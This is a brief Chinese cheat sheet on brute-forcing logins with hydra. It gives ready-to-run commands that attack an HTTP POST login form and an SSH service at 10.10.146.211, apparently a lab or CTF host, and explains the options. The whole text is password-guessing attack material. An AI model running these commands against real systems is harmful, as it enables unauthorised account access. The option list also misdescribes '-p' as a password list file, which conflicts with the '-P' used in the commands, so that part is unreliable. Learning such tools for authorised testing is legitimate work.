利用hydra暴力破解HTTP网站以及SSH常见的选项配置方法

　　破解HTTP POST 用户名密码:

hydra -l <username> -P <wordlist> 10.10.146.211 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

 

　　选项解释：

 

  -l 　　　　 指定单个的用户名
  -L               用户名文件

  -p               密码列表文件

http-post-form      输入提交表单的格式以及字段的名称
   F               用户名密码错误时返回页面的含有的词汇

　　破解SSH用户名与密码：

　

hydra -l <username> -P <full path to pass> 10.10.146.211 -t 4 ssh

 

-t   并发数

-l   指定单个的用户名

-p   密码列表文件